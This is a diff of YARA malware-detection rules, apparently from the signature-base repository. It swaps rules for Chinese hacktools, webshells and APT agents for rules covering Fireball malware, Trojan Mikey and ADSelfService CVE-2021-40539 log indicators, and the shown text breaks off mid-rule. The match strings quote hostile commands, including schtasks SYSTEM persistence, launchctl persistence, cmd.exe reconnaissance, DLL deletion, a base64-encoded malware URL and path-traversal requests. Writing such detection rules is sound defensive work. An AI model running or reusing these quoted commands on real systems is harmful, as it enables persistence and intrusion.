-		$s3 = "strSTUP = WshShell.SpecialFolders(\"Startup\")" fullword ascii
-		$s4 = "[CapsLock]" fullword ascii
+		$s1 = "TerminateProcessWithoutDump" fullword ascii
+		$s2 = ".Downloader.dll" fullword wide
+		$s3 = "Software\\Chromium\\BrowserCrashDumpAttempts" fullword wide
+		$s4 = "QQBrowser_Broker.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or ( $z1 and 2 of ( $s* ) ) ) ) or ( $z1 and all of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Xsltransform_Aug21 : FILE
+rule SIGNATURE_BASE_Chrome_Elf : FILE
 {
 	meta:
-		description = "Detects an ASPX webshell utilizing XSL Transformations"
-		author = "Max Altgelt"
-		id = "44254084-a717-59e6-a3ac-eca3c1c864a8"
-		date = "2020-02-23"
+		description = "Detects Fireball malware - file chrome_elf.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8680d5b5-e26f-5a3f-aeab-b965afe91027"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "https://gist.github.com/JohnHammond/cdae03ca5bc2a14a735ad0334dcb93d6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/webshell_xsl_transform.yar#L1-L19"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L72-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3ac0b50adc4c56769d0248e213e9426a22e0f5086bf081da57f835ff1c77b716"
+		logic_hash = "89f0ab16f164222ecf2a4b14bee02d0c24517d03d1c12b25f5158eebc31b3e3d"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e4d4f6fbfbbbf3904ca45d296dc565138a17484c54aebbb00ba9d57f80dfe7e5"
 
 	strings:
-		$csharpshell = "Language=\"C#\"" nocase
-		$x1 = "<root>1</root>"
-		$x2 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String("
-		$s1 = "XsltSettings.TrustedXslt"
-		$s2 = "Xml.XmlUrlResolver"
-		$s3 = "FromBase64String(Request[\""
+		$x2 = "schtasks /Create /SC HOURLY /MO %d /ST 00:%02d:00 /TN \"%s\" /TR \"%s\" /RU \"SYSTEM\"" fullword wide
+		$s6 = "aHR0cDovL2R2Mm0xdXVtbnNndHUuY2xvdWRmcm9udC5uZXQvdjQvZ3RnLyVzP2FjdGlvbj12aXNpdC5jaGVsZi5pbnN0YWxs" fullword ascii
+		$s7 = "QueryInterface call failed for IExecAction: %x" fullword ascii
+		$s10 = "%s %s,Rundll32_Do %s" fullword wide
+		$s13 = "Failed to create an instance of ITaskService: %x" fullword ascii
+		$s16 = "Rundll32_Do" fullword ascii
 
 	condition:
-		filesize < 500KB and $csharpshell and ( 1 of ( $x* ) or all of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
 }
-rule SIGNATURE_BASE_Keylogger_CN_APT : FILE
+rule SIGNATURE_BASE_Fireball_Regkey : FILE
 {
 	meta:
-		description = "Keylogger - generic rule for a Chinese variant"
+		description = "Detects Fireball malware - file regkey.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7be0b175-05a4-5725-ba21-9438c0fcd740"
-		date = "2016-03-07"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keylogger_cn.yar#L8-L35"
+		id = "6e22bb93-8c8b-510f-a9e4-6e57c392c2ae"
+		date = "2017-06-02"
+		modified = "2022-12-21"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L92-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7"
-		logic_hash = "a5330d15ad7199212cec44ade401c224c40a468650abbc7bf282b26a21cdc22b"
+		logic_hash = "f8fe8b1edb009ac84acf6159feada91d364507c53a9f92abd6b245b38fa058f5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fff2818caa9040486a634896f329b8aebaec9121bdf9982841f0646763a1686b"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE6.0;Windows NT 5.1)" fullword ascii
-		$x2 = "attrib -s -h -r c:\\ntldr" fullword ascii
-		$x3 = "%sWindows NT %d.%d" fullword ascii
-		$x4 = "Referer: http://%s/%s.aspx?n=" fullword ascii
-		$s1 = "\\cmd.exe /c \"systeminfo.exe >> " fullword ascii
-		$s2 = "%s\\cmd.exe /c %s >> \"%s\"" fullword ascii
-		$s3 = "shutdown.exe -r -t 0" fullword ascii
-		$s4 = "dir \"%SystemDrive%\\\" /s /a" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;" fullword ascii
-		$s6 = "http_s.exe" fullword ascii
-		$s7 = "User Agent\\Post Platform\\" ascii
-		$s8 = "desktop.tmp" fullword ascii
-		$s9 = "\\support.icw" ascii
-		$s10 = "agc.tmp" fullword ascii
+		$s1 = "\\WinMain\\Release\\WinMain.pdb" ascii
+		$s2 = "ScreenShot" fullword wide
+		$s3 = "WINMAIN" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_CN_Tools_Xbat : FILE
+rule SIGNATURE_BASE_Fireball_Winsap : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xbat.vbs"
+		description = "Detects Fireball malware - file winsap.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b2f0d2e-a7fb-5f5a-94a9-28e851c9756e"
-		date = "2015-06-13"
+		id = "e68e7738-f325-5b73-9e61-4e2413b7b7be"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L10-L24"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L110-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a7005acda381a09803b860f04d4cae3fdb65d594"
-		logic_hash = "c6dae76bbda7b43eef348c61e1330405923baf724f1aa5d2b51132dde89248fe"
+		logic_hash = "de722d90d82f82faa5dfe5991c846e5c16deb919ae653b8f9fe4d1ad0384c41d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c7244d139ef9ea431a5b9cc6a2176a6a9908710892c74e215431b99cd5228359"
 
 	strings:
-		$s0 = "ws.run \"srss.bat /start\",0 " fullword ascii
-		$s1 = "Set ws = Wscript.CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s1 = "aHR0cDovL2" ascii
+		$s2 = "%s\\svchost.exe -k %s" fullword wide
+		$s3 = "\\SETUP.dll" wide
+		$s4 = "WinSAP.dll" fullword ascii
+		$s5 = "Error %u in WinHttpQueryDataAvailable." fullword ascii
+		$s6 = "UPDATE OVERWRITE" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x6553 and filesize < 0KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
 }
-rule SIGNATURE_BASE_CN_Tools_Temp : FILE
+rule SIGNATURE_BASE_Fireball_Archer : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Temp.war"
+		description = "Detects Fireball malware - file archer.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fbaabd0-fbf2-56a0-94af-9deba1e7cc81"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L26-L42"
+		id = "16bb95c1-af69-5688-8999-f097d02d2ffc"
+		date = "2017-06-02"
+		modified = "2022-12-21"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L130-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c3327ef63b0ed64c4906e9940ef877c76ebaff58"
-		logic_hash = "05fd1cb3f7c8b96ccf824013c130a0b21f43724463f8658e23239d009be7f4fe"
+		logic_hash = "f566ba477ccf1325914b6c9785e2b85f732b211e9321eea24d6c5a0339ccc4d1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022"
 
 	strings:
-		$s0 = "META-INF/context.xml<?xml version=\"1.0\" encoding=\"UTF-8\"?>" fullword ascii
-		$s1 = "browser.jsp" fullword ascii
-		$s3 = "cmd.jsp" fullword ascii
-		$s4 = "index.jsp" fullword ascii
+		$x1 = "\\archer_lyl\\Release\\Archer_Input.pdb" ascii
+		$s1 = "Archer_Input.dll" fullword ascii
+		$s2 = "InstallArcherSvc" fullword ascii
+		$s3 = "%s_%08X" fullword wide
+		$s4 = "d\\\\.\\PhysicalDrive%d" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 203KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_CN_Tools_Srss : FILE
+rule SIGNATURE_BASE_Clearlog : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file srss.bat"
+		description = "Detects Fireball malware - file clearlog.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "13191e2e-fbcd-5e0b-af55-cc10f2583c1b"
-		date = "2015-06-13"
+		id = "3eb58a7a-b04d-52c2-8c3c-c149da8d4aa8"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L44-L58"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L151-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "092ab0797947692a247fe80b100fb4df0f9c37a0"
-		logic_hash = "e01fd60adc32be26b0940ecc127a17bfcfe2ebfcf6cefea76ba6adc61d3c18d4"
+		logic_hash = "6b6fd74ad184cafa7885385f808034e9211ff37e04ed5e8ea4af2c7fb7d697bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3"
 
 	strings:
-		$s0 = "srss.exe -idx 0 -ip"
-		$s1 = "-port 21 -logfilter \"_USER ,_P" ascii
+		$x1 = "\\ClearLog\\Release\\logC.pdb" ascii
+		$s1 = "C:\\Windows\\System32\\cmd.exe /c \"\"" fullword wide
+		$s2 = "logC.dll" fullword ascii
+		$s3 = "hhhhh.exe" fullword wide
+		$s4 = "ttttt.exe" fullword wide
+		$s5 = "Logger Name:" fullword ascii
+		$s6 = "cle.log.1" fullword wide
 
 	condition:
-		filesize < 100 and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_Dll_Unreg : FILE
+rule SIGNATURE_BASE_Fireball_Gubed : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file UnReg.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5c14486d-72a2-5a18-9db0-ce0ab61fdce7"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L60-L74"
+		description = "Detects Fireball malware - file gubed.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cba2913f-4d9a-5925-ad9a-f5815a635291"
+		date = "2017-06-02"
+		modified = "2022-12-21"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L173-L191"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d5e24ba86781c332d0c99dea62f42b14e893d17e"
-		logic_hash = "0e534e475a5b4338aa53bea09325dd63a3d451a13b46a70b5208cabd2deecabe"
+		logic_hash = "e8053d8a95d41d81940bbaf7945323849613dbcfe727559a07bc294bd834b65f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e3f69a1fb6fcaf9fd93386b6ba1d86731cd9e5648f7cff5242763188129cd158"
 
 	strings:
-		$s0 = "regsvr32.exe /u C:\\windows\\system32\\PacketX.dll" fullword ascii
-		$s1 = "del /F /Q C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$x1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MRT.exe" fullword wide
+		$x2 = "tIphlpapi.dll" fullword wide
+		$x3 = "http://%s/provide?clients=%s&reqs=visit.startload" fullword wide
+		$x4 = "\\Gubed\\Release\\Gubed.pdb" ascii
+		$x5 = "d2hrpnfyb3wv3k.cloudfront.net" fullword wide
 
 	condition:
-		filesize < 1KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_Dll_Reg : FILE
+rule SIGNATURE_BASE_Gen_Trojan_Mikey : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Reg.bat"
+		description = "Trojan Mikey - file sample_mikey.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97c0d9ff-6a12-57e3-8219-6c1843a03a29"
-		date = "2015-06-13"
+		id = "ff875436-4fed-5f20-a0a5-bfd146d93499"
+		date = "2015-05-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L76-L90"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mikey_trojan.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cb8a92fe256a3e5b869f9564ecd1aa9c5c886e3f"
-		logic_hash = "db2032d5689f9fcfc446d5ebe8a6d28c6dbd8bcd1d93769ec969d76f8add4f9d"
-		score = 75
+		hash = "a8e6c3ca056b3ff2495d7728654b780735b3a4cb"
+		logic_hash = "5454953bba09d6fc866bcb23ef81a0b6763d8f82b8b606597548cbb5cf6053ed"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "copy PacketX.dll C:\\windows\\system32\\PacketX.dll" fullword ascii
-		$s1 = "regsvr32.exe C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$s0 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS" fullword ascii
+		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)" fullword ascii
+		$x3 = "%d*%u%s" fullword ascii
+		$x4 = "%s %s:%d" fullword ascii
+		$x5 = "Mnopqrst Vwxyabcde Ghijklm Opqrstuv Xya" fullword ascii
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x5a4d and $s0 and 2 of ( $x* )
 }
-rule SIGNATURE_BASE_Sbin_Squid : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_ADSLOG_Sep21 : LOG CVE_2021_40539 FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file squid.bat"
+		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7302e90-d072-599b-a8f2-bf1f21a84de9"
-		date = "2015-06-13"
+		id = "156317c6-e726-506d-8b07-4f74dae2807f"
+		date = "2021-09-20"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L92-L108"
+		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_adselfservice_cve_2021_40539.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8b795a8085c3e6f3d764ebcfe6d59e26fdb91969"
-		logic_hash = "c440bcfda55f926354ea5e462fe1e6a0e9e9585bb1c1539c0aa0588405a46105"
-		score = 75
+		logic_hash = "49b7857187c15f48e928747266adca44c227964cef72914616ea269b0e88fe73"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "LOG, CVE-2021-40539, FILE"
 
 	strings:
-		$s0 = "del /s /f /q" fullword ascii
-		$s1 = "squid.exe -z" fullword ascii
-		$s2 = "net start Squid" fullword ascii
-		$s3 = "net stop Squid" fullword ascii
+		$x1 = "Java traceback errors that include references to NullPointerException in addSmartCardConfig or getSmartCardConfig" ascii wide
 
 	condition:
-		filesize < 1KB and all of them
+		filesize < 50MB and 1 of them
 }
-rule SIGNATURE_BASE_Sql1433_Creck : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Adselfservice_CVE_2021_40539_Weblog_Sep21_1 : LOG CVE_2021_40539 FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file creck.bat"
+		description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38a91464-d493-5154-86ec-e54b3e25309b"
-		date = "2015-06-13"
+		id = "015957a6-8778-5836-af94-6e6d3838f693"
+		date = "2021-09-20"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L110-L125"
+		reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_adselfservice_cve_2021_40539.yar#L16-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "189c11a3b268789a3fbcfac3bd4e03cbfde87b1d"
-		logic_hash = "2d9ff5f130d625450e7de41832695839f0427a6186569280a224f20e89fe1d8a"
-		score = 75
+		logic_hash = "bc27afd63d32ac95711e5b4e70764fe0d1bcbb4b4b9b4e3f324e058bba2ef8f6"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "LOG, CVE-2021-40539, FILE"
 
 	strings:
-		$s0 = "start anhao3.exe -i S.txt -p  pass3.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
-		$s1 = "start anhao1.exe -i S.txt -p  pass1.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
-		$s2 = "start anhao2.exe -i S.txt -p  pass2.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+		$x1 = "/ServletApi/../RestApi/LogonCustomization" ascii wide
+		$x2 = "/ServletApi/../RestAPI/Connection" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x7473 and filesize < 1KB and 1 of them
+		filesize < 50MB and 1 of them
 }
-rule SIGNATURE_BASE_Sql1433_Start : FILE
+rule SIGNATURE_BASE_Suspicious_Autoit_By_Microsoft : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Start.bat"
+		description = "Detects a AutoIt script with Microsoft identification"
 		author = "Florian Roth (Nextron Systems)"
-		id = "89bc249d-dba0-5196-b081-ddbd029ae6c8"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L127-L145"
+		id = "69b1c93d-ab12-5fdc-b6eb-fb135796d3a9"
+		date = "2017-12-14"
+		modified = "2025-03-19"
+		reference = "Internal Research - VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L380-L395"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bd4be10f4c3a982647b2da1a8fb2e19de34eaf01"
-		logic_hash = "b7dfc2b04e838fa3a71487287a50e183443eb62b69cd23494294f231b43baf2f"
-		score = 75
+		logic_hash = "7dfbaf7d136bd9e151c533b49394a9a596450d9cc2643dc144cb693290004591"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c0cbcc598d4e8b501aa0bd92115b4c68ccda0993ca0c6ce19edd2e04416b6213"
 
 	strings:
-		$s1 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s2 = "start creck.bat" fullword ascii
-		$s3 = "del s1.txt" fullword ascii
-		$s4 = "del Result.txt" fullword ascii
-		$s5 = "del s.TXT" fullword ascii
-		$s6 = "mode con cols=48 lines=20" fullword ascii
+		$s1 = "Microsoft Corporation. All rights reserved" fullword wide
+		$s2 = "AutoIt" fullword ascii
 
 	condition:
-		filesize < 1KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Go_Modbus_Jul24_1 : FILE
+rule SIGNATURE_BASE_SUSP_Size_Of_ASUS_Tuningtool : FILE
 {
 	meta:
-		description = "Detects characteristics reported by Dragos for FrostyGoop ICS malware"
-		author = "Florian Roth"
-		id = "4a1e6bbe-d743-5394-b207-e417b64fa76d"
-		date = "2024-07-23"
-		modified = "2024-07-24"
-		reference = "https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_go_modbus.yar#L2-L28"
+		description = "Detects an ASUS tuning tool with a suspicious size"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d22a1bf9-55d6-5cb4-9537-ad13b23af4d1"
+		date = "2018-10-17"
+		modified = "2022-12-21"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L397-L412"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d992c8159deca0ed2b2a33da3c31fdf0efa9a09ba941d059fa7fc1bad458aed1"
-		score = 75
+		logic_hash = "5aadb48f61947ff0362bde5f80830b835ca9e3cb7e1c632d153d0ea5f8bbad6c"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "5d2e4fd08f81e3b2eb2f3eaae16eb32ae02e760afc36fa17f4649322f6da53fb"
+		noarchivescan = 1
+		hash1 = "d4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a"
 
 	strings:
-		$a1 = "Go build"
-		$sa1 = "github.com/rolfl/modbus"
-		$sb1 = "main.TaskList.executeCommand"
-		$sb2 = "main.TargetList.getTargetIpList"
-		$sb3 = "main.TaskList.getTaskIpList"
-		$sb4 = "main.CycleInfo" fullword
+		$s1 = "\\Release\\ASGT.pdb" ascii
 
 	condition:
-		filesize < 30MB and ( $sa1 and 3 of ( $sb* ) ) or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and filesize > 70KB and all of them
 }
-rule SIGNATURE_BASE_MAL_OSX_Fancybear_Agent_Jul18_1 : FILE
+rule SIGNATURE_BASE_SUSP_Piratedoffice_2007 : FILE
 {
 	meta:
-		description = "Detects FancyBear Agent for OSX"
+		description = "Detects an Office document that was created with a pirated version of MS Office 2007"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae717f70-7196-561a-916f-1598ab38c77a"
-		date = "2018-07-15"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1018448895054098432"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_osxagent.yar#L1-L20"
+		id = "b36e9a59-7617-503b-968d-5b6b72b227ea"
+		date = "2018-12-04"
+		modified = "2025-03-19"
+		reference = "https://twitter.com/pwnallthethings/status/743230570440826886?lang=en"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L414-L427"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "099235424f22f3591a891726ea0c13ebf831fae0456ab1b6baba329c090a9535"
-		score = 75
+		logic_hash = "ff94483944a4a4e4bc3cba26fc08fc2a5239f27b301b2ca7cca5edc092c2fc73"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d3be93f6ce59b522ff951cef9d59ef347081ffe33d4203cd5b5df0aaa9721aa2"
+		hash1 = "210448e58a50da22c0031f016ed1554856ed8abe79ea07193dc8f5599343f633"
 
 	strings:
-		$x1 = "/Users/kazak/Desktop/" ascii
-		$s1 = "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist" fullword ascii
-		$s2 = "mkdir -p /Users/Shared/.local/ &> /dev/null" fullword ascii
-		$s3 = "chmod 755 /Users/Shared/start.sh" fullword ascii
-		$s4 = "chmod 755 %s/%s &> /dev/null" fullword ascii
-		$s6 = "chmod 755 /Users/Shared/.local/kextd" fullword ascii
+		$s7 = "<Company>Grizli777</Company>" ascii
 
 	condition:
-		uint16( 0 ) == 0xfacf and filesize < 3000KB and ( 1 of ( $x* ) and 4 of them )
+		uint16( 0 ) == 0xcfd0 and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_1 : CVE_2022_22954
+rule SIGNATURE_BASE_SUSP_Scheduled_Task_Bigsize : FILE
 {
 	meta:
-		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
-		author = "Florian Roth"
-		id = "c1923d78-c339-584a-a47c-edff8f72fd0d"
-		date = "2022-04-08"
-		modified = "2025-03-29"
-		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
-		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L2-L33"
+		description = "Detects suspiciously big scheduled task XML file as seen in combination with embedded base64 encoded PowerShell code"
+		author = "Florian Roth (Nextron Systems)"
+		id = "61b07b30-1058-5a53-99e7-2c48ec9d23b5"
+		date = "2018-12-06"
+		modified = "2025-03-19"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L429-L445"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
